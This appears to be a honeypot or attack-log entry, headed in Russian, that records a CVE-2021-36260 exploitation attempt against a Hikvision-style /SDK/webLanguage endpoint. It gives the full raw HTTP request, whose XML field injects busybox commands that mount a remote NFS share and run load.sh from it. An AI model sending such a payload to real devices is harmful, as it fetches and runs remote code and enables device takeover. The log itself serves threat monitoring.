Информация об атаке

Tag
CVE-2021-36260
Date
2025-08-21
Client IP
45.153.34.225
Client GEO
germany 
RAW request
PUT /SDK/webLanguage HTTP/1.0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Host: ████████████
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 165
X-Forwarded-For: █████████████
Accept-Encoding: gzip, deflate
Accept: */*
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: en US,en;q=0.9,sv;q=0.8
Connection: close

<?xml version="1.0" encoding="UTF-8"?><language>$(busybox mkdir jn;busybox mount -o intr,nolock,tcp,exec █████████████:/srv/nfs/shared jn;cd jn;./load.sh)</language>